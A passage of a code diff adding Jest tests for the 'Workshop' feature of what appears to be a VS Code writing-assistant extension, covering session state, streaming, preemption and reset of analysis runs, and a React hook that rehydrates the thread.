+    session.setExcerpt({ text: 'Some prose.', sourceUri: 'file:///ch1.md' });
+    mockService.analyzeWritingTools.mockImplementation(
+      async (_text, _ctx, _uri, _focus, streamingOptions) => {
+        streamingOptions?.onToken?.('chunk-1');
+        streamingOptions?.onToken?.('chunk-2');
+        return analysisResult('cliché analysis') as any;
+      }
+    );
+
+    await handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'cliche' }) as any
+    );
+
+    // Routed to the writing-tools contract with the focus = tool id.
+    expect(mockService.analyzeWritingTools).toHaveBeenCalledWith(
+      'Some prose.',
+      undefined,
+      'file:///ch1.md',
+      'cliche',
+      expect.objectContaining({ signal: expect.anything(), onToken: expect.any(Function) })
+    );
+
+    // Streaming lifecycle, all under domain 'workshop'.
+    const started = postedOf(MessageType.STREAM_STARTED);
+    const chunks = postedOf(MessageType.STREAM_CHUNK);
+    const completes = postedOf(MessageType.STREAM_COMPLETE);
+    expect(started).toHaveLength(1);
+    expect(started[0].payload.domain).toBe('workshop');
+    expect(chunks.map((c) => c.payload.token)).toEqual(['chunk-1', 'chunk-2']);
+    expect(chunks.every((c) => c.payload.domain === 'workshop')).toBe(true);
+    expect(completes).toHaveLength(1);
+    expect(completes[0].payload).toMatchObject({
+      domain: 'workshop',
+      content: 'cliché analysis',
+      cancelled: false
+    });
+
+    // Turn pair posted and recorded.
+    const turns = postedOf(MessageType.WORKSHOP_TURN);
+    expect(turns.map((t) => t.payload.turn.role)).toEqual(['user', 'assistant']);
+    expect(turns[1].payload.turn.content).toBe('cliché analysis');
+    expect(turns[1].payload.turn.usage?.totalTokens).toBe(30);
+    expect(session.getSnapshot().turns.map((t) => t.role)).toEqual(['user', 'assistant']);
+    expect(session.getSnapshot().activeToolId).toBeUndefined();
+
+    // Snapshot broadcast keeps the replay cache fresh (mid-run + completion).
+    expect(postedOf(MessageType.WORKSHOP_SESSION_STATE).length).toBeGreaterThanOrEqual(2);
+  });
+
+  it('routes dialogue and prose ids to their dedicated service calls', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+
+    await handler.handleRunTool(message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'dialogue' }) as any);
+    expect(mockService.analyzeDialogue).toHaveBeenCalledTimes(1);
+
+    await handler.handleRunTool(message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any);
+    expect(mockService.analyzeProse).toHaveBeenCalledTimes(1);
+    expect(mockService.analyzeWritingTools).not.toHaveBeenCalled();
+  });
+
+  it('keeps the thread clean and reports an error when the API key is missing', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+    mockService.analyzeProse.mockResolvedValue(
+      analysisResult(`${API_KEY_NOT_CONFIGURED_HEADING}\n\nConfigure your key…`) as any
+    );
+
+    await handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+
+    const [error] = postedOf(MessageType.ERROR);
+    expect(error.payload.message).toMatch(/API key/i);
+    // The attempted user turn stays; no assistant turn carries the warning.
+    const roles = session.getSnapshot().turns.map((t) => t.role);
+    expect(roles).toEqual(['user']);
+    const completes = postedOf(MessageType.STREAM_COMPLETE);
+    expect(completes[0].payload.cancelled).toBe(true);
+  });
+
+  it('surfaces service failures as workshop errors and unsticks the stream', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+    mockService.analyzeProse.mockRejectedValue(new Error('boom'));
+
+    await handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+
+    const [error] = postedOf(MessageType.ERROR);
+    expect(error.payload).toMatchObject({ source: 'workshop.run_tool', details: 'boom' });
+    const completes = postedOf(MessageType.STREAM_COMPLETE);
+    expect(completes).toHaveLength(1);
+    expect(completes[0].payload.cancelled).toBe(true);
+    expect(session.getSnapshot().activeToolId).toBeUndefined();
+    expect(session.getSnapshot().turns.map((t) => t.role)).toEqual(['user']);
+  });
+
+  it('reset clears the thread (and aborts nothing when idle) then serves the empty session', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+    await handler.handleRunTool(message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any);
+    postMessage.mockClear();
+
+    await handler.handleResetSession(message(MessageType.WORKSHOP_RESET_SESSION, {}) as any);
+
+    const [state] = postedOf(MessageType.WORKSHOP_SESSION_STATE);
+    expect(state.payload.session.turns).toEqual([]);
+    expect(state.payload.session.activeToolId).toBeUndefined();
+    // Excerpt survives reset — new session over the same working text.
+    expect(state.payload.session.excerpt.text).toBe('Some prose.');
+  });
+
+  it('a reset mid-run aborts the in-flight request and drops its late completion', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+
+    let releaseRun!: () => void;
+    let observedSignal: AbortSignal | undefined;
+    mockService.analyzeProse.mockImplementation(async (_t, _c, _u, streamingOptions) => {
+      observedSignal = streamingOptions?.signal;
+      await new Promise<void>((resolve) => {
+        releaseRun = resolve;
+      });
+      return analysisResult('late result') as any;
+    });
+
+    const runPromise = handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+    await Promise.resolve(); // let the run reach the service call
+
+    await handler.handleResetSession(message(MessageType.WORKSHOP_RESET_SESSION, {}) as any);
+    expect(observedSignal?.aborted).toBe(true);
+
+    releaseRun();
+    await runPromise;
+
+    // The zombie result never lands: no assistant turn, thread stays empty.
+    expect(session.getSnapshot().turns).toEqual([]);
+    const turnPosts = postedOf(MessageType.WORKSHOP_TURN).map((t) => t.payload.turn.role);
+    expect(turnPosts).toEqual(['user']); // only the pre-reset user turn was ever posted
+  });
+
+  it('serves the session snapshot on request', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+
+    await handler.handleRequestSession(message(MessageType.WORKSHOP_REQUEST_SESSION, {}) as any);
+
+    const [state] = postedOf(MessageType.WORKSHOP_SESSION_STATE);
+    expect(state.source).toBe('extension.workshop');
+    expect(state.payload.session.excerpt.text).toBe('Some prose.');
+    expect(postedTypes()).toEqual([MessageType.WORKSHOP_SESSION_STATE]);
+  });
+
+  it('dispose releases the status listener and aborts any in-flight run', async () => {
+    const disposeListener = jest.fn();
+    (mockService.addStatusListener as jest.Mock).mockReturnValue(disposeListener);
+    const local = new WorkshopHandler(mockService, session, postMessage, log);
+
+    session.setExcerpt({ text: 'Some prose.' });
+    let releaseRun!: () => void;
+    let observedSignal: AbortSignal | undefined;
+    mockService.analyzeProse.mockImplementation(async (_t, _c, _u, streamingOptions) => {
+      observedSignal = streamingOptions?.signal;
+      await new Promise<void>((resolve) => {
+        releaseRun = resolve;
+      });
+      return analysisResult('late') as any;
+    });
+
+    const runPromise = local.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+    await Promise.resolve();
+
+    local.dispose();
+
+    expect(disposeListener).toHaveBeenCalledTimes(1);
+    expect(observedSignal?.aborted).toBe(true);
+    expect(session.getSnapshot().activeRequestId).toBeUndefined();
+
+    releaseRun();
+    await runPromise;
+    expect(session.getSnapshot().turns.map((t) => t.role)).toEqual(['user']);
+  });
+});

--- a/packages/core/src/__tests__/application/handlers/domain/WorkshopHandler.test.ts
+++ b/packages/core/src/__tests__/application/handlers/domain/WorkshopHandler.test.ts
@@ -90,6 +90,43 @@ describe('WorkshopHandler', () => {
     expect(postedOf(MessageType.WORKSHOP_SESSION_STATE)).toHaveLength(0);
   });
 
+  it('refuses a mid-run re-pin — the finished turn must describe the excerpt it ran on', async () => {
+    session.setExcerpt({ text: 'The original excerpt.' });
+
+    let releaseRun!: () => void;
+    mockService.analyzeProse.mockImplementation(async () => {
+      await new Promise<void>((resolve) => {
+        releaseRun = resolve;
+      });
+      return analysisResult('analysis of the original') as any;
+    });
+
+    const runPromise = handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+    await Promise.resolve(); // run is in flight
+
+    await handler.handleSetExcerpt(
+      message(MessageType.WORKSHOP_SET_EXCERPT, { text: 'A sneaky replacement.' }) as any
+    );
+
+    const errors = postedOf(MessageType.ERROR);
+    expect(errors).toHaveLength(1);
+    expect(errors[0].payload.source).toBe('workshop');
+    expect(errors[0].payload.message).toMatch(/still running/i);
+    // The pinned excerpt is untouched — no silent misattribution window.
+    expect(session.getExcerpt()?.text).toBe('The original excerpt.');
+
+    releaseRun();
+    await runPromise;
+    expect(session.getSnapshot().turns.map((t) => t.role)).toEqual(['user', 'assistant']);
+    // Re-pin works again once the run has settled.
+    await handler.handleSetExcerpt(
+      message(MessageType.WORKSHOP_SET_EXCERPT, { text: 'A sneaky replacement.' }) as any
+    );
+    expect(session.getExcerpt()?.text).toBe('A sneaky replacement.');
+  });
+
   it('refuses to run a tool without a pinned excerpt', async () => {
     await handler.handleRunTool(
       message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
@@ -162,6 +199,130 @@ describe('WorkshopHandler', () => {
 
     // Snapshot broadcast keeps the replay cache fresh (mid-run + completion).
     expect(postedOf(MessageType.WORKSHOP_SESSION_STATE).length).toBeGreaterThanOrEqual(2);
+
+    // The EXACT cross-message order is the webview handshake contract
+    // (PR #67 review #7): useWorkshop keeps the live bubble alive until the
+    // assistant turn lands, so STREAM_COMPLETE must precede it, and both
+    // turns must bracket the stream. A refactor that reorders these should
+    // fail here, not in a user's thread.
+    expect(postedTypes()).toEqual([
+      MessageType.WORKSHOP_TURN, // user
+      MessageType.WORKSHOP_SESSION_STATE, // mid-run snapshot (reload adoption)
+      MessageType.STREAM_STARTED,
+      MessageType.STATUS, // "Streaming Cliché…"
+      MessageType.STREAM_CHUNK,
+      MessageType.STREAM_CHUNK,
+      MessageType.STREAM_COMPLETE,
+      MessageType.WORKSHOP_TURN, // assistant — strictly after COMPLETE
+      MessageType.WORKSHOP_SESSION_STATE, // completion snapshot
+      MessageType.STATUS // final '' clear
+    ]);
+  });
+
+  it('a preempted run cannot blank the successor\'s status, and its late result is refused', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+
+    let releaseFirst!: () => void;
+    mockService.analyzeProse.mockImplementation(async () => {
+      await new Promise<void>((resolve) => {
+        releaseFirst = resolve;
+      });
+      return analysisResult('first result — must never land') as any;
+    });
+    let releaseSecond!: () => void;
+    mockService.analyzeDialogue.mockImplementation(async () => {
+      await new Promise<void>((resolve) => {
+        releaseSecond = resolve;
+      });
+      return analysisResult('second result') as any;
+    });
+
+    const firstRun = handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+    await Promise.resolve();
+
+    const secondRun = handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'dialogue' }) as any
+    );
+    await Promise.resolve();
+
+    // Preemption leaves a request-correlated trail (PR #67 review #4).
+    expect((log.appendLine as jest.Mock).mock.calls.flat().join('\n')).toMatch(
+      /Preempting in-flight run: workshop_prose-.*\(Prose\)/
+    );
+
+    // First run settles AFTER being preempted: its finally must NOT blank
+    // the second run's "Streaming…" ticker (PR #67 review #15).
+    releaseFirst();
+    await firstRun;
+
+    const statusesAfterFirstSettles = postedOf(MessageType.STATUS).map((s) => s.payload.message);
+    expect(statusesAfterFirstSettles[statusesAfterFirstSettles.length - 1]).toBe(
+      'Streaming Dialogue & Beats…'
+    );
+    // Its stream completed as cancelled, and the cancellation left a trail.
+    const firstComplete = postedOf(MessageType.STREAM_COMPLETE)[0];
+    expect(firstComplete.payload.cancelled).toBe(true);
+    expect((log.appendLine as jest.Mock).mock.calls.flat().join('\n')).toMatch(
+      /Run cancelled: workshop_prose-/
+    );
+
+    releaseSecond();
+    await secondRun;
+
+    // The thread records both attempts but only the survivor's analysis.
+    expect(session.getSnapshot().turns.map((t) => [t.role, t.toolId])).toEqual([
+      ['user', 'prose'],
+      ['user', 'dialogue'],
+      ['assistant', 'dialogue']
+    ]);
+    // And the second run's own finally does clear the ticker at the end.
+    const finalStatuses = postedOf(MessageType.STATUS).map((s) => s.payload.message);
+    expect(finalStatuses[finalStatuses.length - 1]).toBe('');
+  });
+
+  it('guide-loading status is forwarded only while a workshop run is in flight (idle gating)', async () => {
+    // Capture the listener the handler registered on the shared service.
+    let capturedListener: ((m: string, p?: unknown, t?: string) => void) | undefined;
+    const localService = {
+      ...mockService,
+      addStatusListener: jest.fn((listener) => {
+        capturedListener = listener;
+        return jest.fn();
+      })
+    } as unknown as jest.Mocked<AssistantToolService>;
+    const localPost = jest.fn().mockResolvedValue(undefined);
+    const localHandler = new WorkshopHandler(localService, session, localPost, log);
+    expect(capturedListener).toBeDefined();
+
+    // Idle: another surface's guide loading must not surface here.
+    capturedListener!('Loading requested craft guides...', undefined, 'guide.md');
+    expect(localPost).not.toHaveBeenCalled();
+
+    // In flight: the same signal IS this run's progress — forward it.
+    session.setExcerpt({ text: 'Some prose.' });
+    let releaseRun!: () => void;
+    (localService.analyzeProse as jest.Mock).mockImplementation(async () => {
+      await new Promise<void>((resolve) => {
+        releaseRun = resolve;
+      });
+      return analysisResult('done') as any;
+    });
+    const runPromise = localHandler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+    await Promise.resolve();
+
+    capturedListener!('Loading requested craft guides...', undefined, 'guide.md');
+    const statuses = localPost.mock.calls
+      .map((c) => c[0])
+      .filter((m) => m.type === MessageType.STATUS)
+      .map((m) => m.payload.message);
+    expect(statuses).toContain('Loading requested craft guides...');
+
+    releaseRun();
+    await runPromise;
   });
 
   it('routes dialogue and prose ids to their dedicated service calls', async () => {
@@ -253,6 +414,11 @@ describe('WorkshopHandler', () => {
     expect(session.getSnapshot().turns).toEqual([]);
     const turnPosts = postedOf(MessageType.WORKSHOP_TURN).map((t) => t.payload.turn.role);
     expect(turnPosts).toEqual(['user']); // only the pre-reset user turn was ever posted
+
+    // Designed disappearances leave a request-correlated trail (PR #67 #4).
+    const logLines = (log.appendLine as jest.Mock).mock.calls.flat().join('\n');
+    expect(logLines).toMatch(/Preempting in-flight run: workshop_prose-/);
+    expect(logLines).toMatch(/Run cancelled: workshop_prose-/);
   });
 
   it('serves the session snapshot on request', async () => {

--- a/packages/core/src/__tests__/application/services/WorkshopSessionService.test.ts
+++ b/packages/core/src/__tests__/application/services/WorkshopSessionService.test.ts
@@ -1,0 +1,156 @@
+/**
+ * WorkshopSessionService tests — the Sprint 2 session aggregate.
+ *
+ * Behavior under test (sprint acceptance criteria):
+ * - set-excerpt pins host-stamped excerpt state,
+ * - a tool run appends a user+assistant turn pair and tracks the active tool,
+ * - reset clears the thread and active run (excerpt survives),
+ * - stale completions (reset/preempt mid-stream) never corrupt the thread,
+ * - snapshots are copies — mutating them cannot reach session truth.
+ */
+
+import { WorkshopSessionService } from '@/application/services/WorkshopSessionService';
+
+describe('WorkshopSessionService', () => {
+  let clock: number;
+  let service: WorkshopSessionService;
+
+  beforeEach(() => {
+    clock = 1_000;
+    service = new WorkshopSessionService(() => ++clock);
+  });
+
+  const pin = (text = 'She left the letter on the table.') =>
+    service.setExcerpt({ text, sourceUri: 'file:///ch1.md', relativePath: 'chapters/ch1.md' });
+
+  it('pins an excerpt with source metadata and a host-stamped pin time', () => {
+    const excerpt = pin();
+
+    expect(excerpt.text).toBe('She left the letter on the table.');
+    expect(excerpt.relativePath).toBe('chapters/ch1.md');
+    expect(excerpt.pinnedAt).toBeGreaterThan(1_000);
+    expect(service.getSnapshot().excerpt).toEqual(excerpt);
+  });
+
+  it('refuses to begin a tool run without a usable excerpt', () => {
+    expect(() => service.beginToolRun('prose', 'req-1')).toThrow(/pinned excerpt/);
+
+    service.setExcerpt({ text: '   \n  ' });
+    expect(() => service.beginToolRun('prose', 'req-1')).toThrow(/pinned excerpt/);
+  });
+
+  it('appends a user+assistant turn pair across a begin/complete run', () => {
+    pin();
+    const userTurn = service.beginToolRun('dialogue', 'req-1');
+    const assistantTurn = service.completeToolRun(
+      'req-1',
+      'Beat analysis…',
+      { promptTokens: 10, completionTokens: 20, totalTokens: 30 },
+      true
+    );
+
+    const { turns } = service.getSnapshot();
+    expect(turns).toHaveLength(2);
+    expect(turns[0]).toMatchObject({
+      role: 'user',
+      kind: 'tool_run',
+      toolId: 'dialogue',
+      toolLabel: 'Dialogue & Beats'
+    });
+    expect(turns[0].content).toContain('Dialogue & Beats');
+    expect(turns[1]).toMatchObject({
+      role: 'assistant',
+      toolId: 'dialogue',
+      content: 'Beat analysis…',
+      truncated: true
+    });
+    expect(turns[1].usage).toEqual({ promptTokens: 10, completionTokens: 20, totalTokens: 30 });
+    expect(turns[0].id).not.toBe(turns[1].id);
+    expect(userTurn.id).toBe(turns[0].id);
+    expect(assistantTurn?.id).toBe(turns[1].id);
+  });
+
+  it('tracks the active tool between begin and complete', () => {
+    pin();
+    service.beginToolRun('cliche', 'req-1');
+
+    let snapshot = service.getSnapshot();
+    expect(snapshot.activeToolId).toBe('cliche');
+    expect(snapshot.activeRequestId).toBe('req-1');
+
+    service.completeToolRun('req-1', 'done');
+    snapshot = service.getSnapshot();
+    expect(snapshot.activeToolId).toBeUndefined();
+    expect(snapshot.activeRequestId).toBeUndefined();
+  });
+
+  it('ignores a stale completion after the run was preempted by a newer one', () => {
+    pin();
+    service.beginToolRun('prose', 'req-1');
+    service.beginToolRun('gestures', 'req-2'); // fresh turn preempts req-1
+
+    expect(service.completeToolRun('req-1', 'late result')).toBeUndefined();
+
+    const { turns, activeRequestId } = service.getSnapshot();
+    // Two user turns, no assistant turn from the stale completion.
+    expect(turns.map((t) => t.role)).toEqual(['user', 'user']);
+    expect(activeRequestId).toBe('req-2');
+  });
+
+  it('abandon clears the active run but keeps the attempted user turn', () => {
+    pin();
+    service.beginToolRun('editor', 'req-1');
+    service.abandonToolRun('req-1');
+
+    const snapshot = service.getSnapshot();
+    expect(snapshot.activeToolId).toBeUndefined();
+    expect(snapshot.turns).toHaveLength(1);
+    expect(snapshot.turns[0].role).toBe('user');
+
+    // Completion after abandon is stale too.
+    expect(service.completeToolRun('req-1', 'late')).toBeUndefined();
+  });
+
+  it('reset clears turns and the active run while the excerpt survives', () => {
+    const excerpt = pin();
+    service.beginToolRun('style', 'req-1');
+    service.completeToolRun('req-1', 'result');
+    service.beginToolRun('fresh', 'req-2');
+
+    service.reset();
+
+    const snapshot = service.getSnapshot();
+    expect(snapshot.turns).toEqual([]);
+    expect(snapshot.activeToolId).toBeUndefined();
+    expect(snapshot.activeRequestId).toBeUndefined();
+    expect(snapshot.excerpt).toEqual(excerpt);
+
+    // The pre-reset run can no longer land a turn.
+    expect(service.completeToolRun('req-2', 'zombie result')).toBeUndefined();
+    expect(service.getSnapshot().turns).toEqual([]);
+  });
+
+  it('hands out copies — mutating a snapshot or returned turn never reaches session state', () => {
+    pin();
+    service.beginToolRun('prose', 'req-1');
+    const returned = service.completeToolRun('req-1', 'result', {
+      promptTokens: 1,
+      completionTokens: 2,
+      totalTokens: 3
+    });
+
+    const snapshot = service.getSnapshot();
+    snapshot.turns.pop();
+    snapshot.turns[0].content = 'vandalized';
+    snapshot.excerpt!.text = 'vandalized';
+    returned!.content = 'vandalized';
+    returned!.usage!.totalTokens = 999;
+
+    const fresh = service.getSnapshot();
+    expect(fresh.turns).toHaveLength(2);
+    expect(fresh.turns[0].content).toContain('Prose');
+    expect(fresh.turns[1].content).toBe('result');
+    expect(fresh.turns[1].usage?.totalTokens).toBe(3);
+    expect(fresh.excerpt?.text).toBe('She left the letter on the table.');
+  });
+});

--- a/packages/core/src/__tests__/architecture/boundaries.test.ts
+++ b/packages/core/src/__tests__/architecture/boundaries.test.ts
@@ -54,8 +54,11 @@ const HANDLERS_ROOT = path.join(
   'handlers'
 );
 
+// WorkshopSessionService is in the net (PR #67 review #14): it is the
+// composition-root-owned reload-safety aggregate — a handler `new`-ing its
+// own copy would silently fork the session per webview.
 const FORBIDDEN_INFRASTRUCTURE_CONSTRUCTION = new RegExp(
-  String.raw`\bnew\s+(TextSourceResolver|CategorySearchService|AccountBalanceService|OpenRouterAccountClient|PublishingStandardsRepository)\b`
+  String.raw`\bnew\s+(TextSourceResolver|CategorySearchService|AccountBalanceService|OpenRouterAccountClient|PublishingStandardsRepository|WorkshopSessionService)\b`
 );
 
 function collectSourceFiles(dir: string, acc: string[] = []): string[] {

--- a/packages/core/src/__tests__/infrastructure/api/services/search/CategorySearchService.test.ts
+++ b/packages/core/src/__tests__/infrastructure/api/services/search/CategorySearchService.test.ts
@@ -47,9 +47,9 @@ describe('CategorySearchService', () => {
       wordSearchService,
       createFakeFileSystem(),
       '/ext',
-      outputChannel,
-      statusEmitter
+      outputChannel
     );
+    service.addStatusListener(statusEmitter);
 
     return { service, orchestrator, wordSearchService, statusEmitter };
   };

--- a/packages/core/src/__tests__/presentation/webview/hooks/domain/useWorkshop.test.ts
+++ b/packages/core/src/__tests__/presentation/webview/hooks/domain/useWorkshop.test.ts
@@ -1,0 +1,333 @@
+/**
+ * @jest-environment jsdom
+ */
+
+/**
+ * useWorkshop tests — the webview half of Sprint 2's reload-safety criterion
+ * (PR #67 review #1: the one domain hook that shipped without a test).
+ *
+ * Behavior under test:
+ * - mount requests the host session; a snapshot rehydrates the whole thread,
+ *   including ADOPTING a mid-run request after a reload,
+ * - the streaming lifecycle under domain 'workshop' (foreign domains and
+ *   stale requestIds ignored),
+ * - the settled handshake: the live bubble SURVIVES stream-complete and
+ *   retires only when the assistant turn lands (the flicker regression net),
+ * - cancelled/error paths clear immediately via the authoritative snapshot,
+ * - STATUS/ERROR source filtering keeps sidebar noise out of the Workshop.
+ */
+
+import { renderHook, act } from '@testing-library/react';
+import { useWorkshop } from '@hooks/domain/useWorkshop';
+import { MessageType } from '@shared/types';
+import type {
+  ErrorMessage,
+  StatusMessage,
+  StreamChunkMessage,
+  StreamCompleteMessage,
+  StreamStartedMessage,
+  WorkshopSessionSnapshot,
+  WorkshopSessionStateMessage,
+  WorkshopTurn,
+  WorkshopTurnMessage
+} from '@messages';
+import { createMockVSCode } from '@/__tests__/mocks/vscode';
+
+jest.mock('../../../../../presentation/webview/hooks/useVSCodeApi');
+
+import { useVSCodeApi } from '@hooks/useVSCodeApi';
+
+const sessionState = (session: Partial<WorkshopSessionSnapshot>): WorkshopSessionStateMessage => ({
+  type: MessageType.WORKSHOP_SESSION_STATE,
+  source: 'extension.workshop',
+  payload: { session: { turns: [], ...session } },
+  timestamp: 0
+});
+
+const makeTurn = (overrides: Partial<WorkshopTurn>): WorkshopTurn => ({
+  id: 'turn-1-user-1000',
+  role: 'user',
+  kind: 'tool_run',
+  toolId: 'prose',
+  toolLabel: 'Prose',
+  content: 'Run **Prose** on the pinned excerpt.',
+  timestamp: 1000,
+  ...overrides
+});
+
+const turnMessage = (turn: WorkshopTurn): WorkshopTurnMessage => ({
+  type: MessageType.WORKSHOP_TURN,
+  source: 'extension.workshop',
+  payload: { turn },
+  timestamp: 0
+});
+
+const streamStarted = (requestId: string, domain = 'workshop'): StreamStartedMessage => ({
+  type: MessageType.STREAM_STARTED,
+  source: 'extension.workshop',
+  payload: { requestId, domain: domain as never },
+  timestamp: 0
+});
+
+const streamChunk = (requestId: string, token: string, domain = 'workshop'): StreamChunkMessage => ({
+  type: MessageType.STREAM_CHUNK,
+  source: 'extension.workshop',
+  payload: { requestId, domain: domain as never, token },
+  timestamp: 0
+});
+
+const streamComplete = (
+  requestId: string,
+  cancelled: boolean,
+  content = ''
+): StreamCompleteMessage => ({
+  type: MessageType.STREAM_COMPLETE,
+  source: 'extension.workshop',
+  payload: { requestId, domain: 'workshop', content, cancelled },
+  timestamp: 0
+});
+
+describe('useWorkshop', () => {
+  let mockVSCode: ReturnType<typeof createMockVSCode>;
+
+  beforeEach(() => {
+    jest.useFakeTimers();
+    mockVSCode = createMockVSCode();
+    (useVSCodeApi as jest.Mock).mockReturnValue(mockVSCode);
+  });
+
+  afterEach(() => {
+    jest.useRealTimers();
+    jest.clearAllMocks();
+  });
+
+  const posted = (type: MessageType) =>
+    mockVSCode.postMessage.mock.calls.map((c) => c[0]).filter((m) => m.type === type);
+
+  it('requests the host session on mount (reload rehydration entry point)', () => {
+    renderHook(() => useWorkshop());
+
+    const requests = posted(MessageType.WORKSHOP_REQUEST_SESSION);
+    expect(requests).toHaveLength(1);
+    expect(requests[0].source).toBe('webview.workshop');
+  });
+
+  it('rehydrates the whole thread from a session snapshot', () => {
+    const { result } = renderHook(() => useWorkshop());
+    const turns = [
+      makeTurn({ id: 't1' }),
+      makeTurn({ id: 't2', role: 'assistant', content: 'Analysis…' })
+    ];
+
+    act(() => {
+      result.current.handleSessionState(
+        sessionState({
+          excerpt: { text: 'Pinned prose.', relativePath: 'ch1.md', pinnedAt: 1 },
+          turns
+        })
+      );
+    });
+
+    expect(result.current.sessionReady).toBe(true);
+    expect(result.current.excerpt?.relativePath).toBe('ch1.md');
+    expect(result.current.turns.map((t) => t.id)).toEqual(['t1', 't2']);
+    expect(result.current.isRunning).toBe(false);
+  });
+
+  it('adopts a mid-run request from the snapshot so post-reload chunks attach', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    act(() => {
+      result.current.handleSessionState(
+        sessionState({
+          excerpt: { text: 'Pinned prose.', pinnedAt: 1 },
+          turns: [makeTurn({ id: 't1', toolId: 'cliche', toolLabel: 'Cliché' })],
+          activeToolId: 'cliche',
+          activeRequestId: 'req-live'
+        })
+      );
+    });
+
+    expect(result.current.currentRequestId).toBe('req-live');
+    expect(result.current.activeToolId).toBe('cliche');
+    expect(result.current.isRunning).toBe(true);
+    expect(result.current.isStreaming).toBe(true);
+
+    // Chunks for the adopted request land; the completed turn arrives whole.
+    act(() => {
+      result.current.handleStreamChunk(streamChunk('req-live', 'more '));
+    });
+    expect(result.current.streamingChunkCount).toBe(1);
+  });
+
+  it('appends turns and dedupes by id (live increment + snapshot overlap)', () => {
+    const { result } = renderHook(() => useWorkshop());
+    const turn = makeTurn({ id: 'dup' });
+
+    act(() => {
+      result.current.handleTurn(turnMessage(turn));
+      result.current.handleTurn(turnMessage(turn));
+    });
+
+    expect(result.current.turns).toHaveLength(1);
+  });
+
+  it('ignores foreign-domain and stale-request stream events', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    act(() => {
+      result.current.handleStreamStarted(streamStarted('req-analysis', 'analysis'));
+    });
+    expect(result.current.isStreaming).toBe(false);
+
+    act(() => {
+      result.current.handleStreamStarted(streamStarted('req-1'));
+    });
+    act(() => {
+      result.current.handleStreamChunk(streamChunk('req-1', 'mine'));
+      result.current.handleStreamChunk(streamChunk('req-stale', 'not mine'));
+      result.current.handleStreamChunk(streamChunk('req-1', 'dictionary', 'dictionary'));
+    });
+
+    expect(result.current.streamingChunkCount).toBe(1);
+
+    // A stale completion must not end the live stream either.
+    act(() => {
+      result.current.handleStreamComplete(streamComplete('req-stale', false, 'zombie'));
+    });
+    expect(result.current.isStreaming).toBe(true);
+  });
+
+  it('keeps the live bubble after COMPLETE and retires it only when the assistant turn lands', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    act(() => {
+      result.current.handleStreamStarted(streamStarted('req-1'));
+    });
+    act(() => {
+      result.current.handleStreamChunk(streamChunk('req-1', 'Streamed analysis text'));
+    });
+    act(() => {
+      result.current.handleStreamComplete(streamComplete('req-1', false, 'Streamed analysis text'));
+    });
+
+    // Stream is over but the turn hasn't arrived: the bubble's content must
+    // SURVIVE this window (PR #67 review #16 — the flicker was it resetting
+    // here). endStreaming publishes the full buffer as displayContent.
+    expect(result.current.isStreaming).toBe(false);
+    expect(result.current.currentRequestId).toBeNull();
+    expect(result.current.streamingContent).toBe('Streamed analysis text');
+
+    // The assistant turn lands → the bubble retires (content cleared).
+    act(() => {
+      result.current.handleTurn(
+        turnMessage(makeTurn({ id: 'a1', role: 'assistant', content: 'Streamed analysis text' }))
+      );
+    });
+    expect(result.current.turns).toHaveLength(1);
+    expect(result.current.streamingContent).toBe('');
+  });
+
+  it('clears immediately on a cancelled completion (preempt/reset/failure path)', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    act(() => {
+      result.current.handleStreamStarted(streamStarted('req-1'));
+    });
+    act(() => {
+      result.current.handleStreamChunk(streamChunk('req-1', 'partial'));
+    });
+    act(() => {
+      result.current.handleStreamComplete(streamComplete('req-1', true));
+    });
+
+    expect(result.current.isStreaming).toBe(false);
+    expect(result.current.currentRequestId).toBeNull();
+    expect(result.current.streamingContent).toBe('');
+  });
+
+  it('a no-run snapshot is authoritative: retires a live bubble after the error path', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    act(() => {
+      result.current.handleStreamStarted(streamStarted('req-1'));
+    });
+    act(() => {
+      result.current.handleStreamChunk(streamChunk('req-1', 'done'));
+    });
+    act(() => {
+      result.current.handleStreamComplete(streamComplete('req-1', false, 'done'));
+    });
+    expect(result.current.streamingContent).toBe('done');
+
+    // Handler error path posts a snapshot with no active run and no turn.
+    act(() => {
+      result.current.handleSessionState(sessionState({ turns: [makeTurn({ id: 't1' })] }));
+    });
+
+    expect(result.current.streamingContent).toBe('');
+    expect(result.current.isRunning).toBe(false);
+  });
+
+  it('accepts only workshop-sourced STATUS (sidebar progress stays out)', () => {
+    const { result } = renderHook(() => useWorkshop());
+
+    const status = (source: string, message: string): StatusMessage => ({
+      type: MessageType.STATUS,
+      source: source as never,
+      payload: { message },
+      timestamp: 0
+    });
+
+    act(() => {
+      result.current.handleStatusMessage(status('extension.dictionary', 'Generating block 3/7…'));
+    });
+    expect(result.current.statusMessage).toBe('');
+
+    act(() => {
+      result.current.handleStatusMessage(status('extension.workshop', 'Streaming Prose…'));
+    });
+    expect(result.current.statusMessage).toBe('Streaming Prose…');
+  });
+
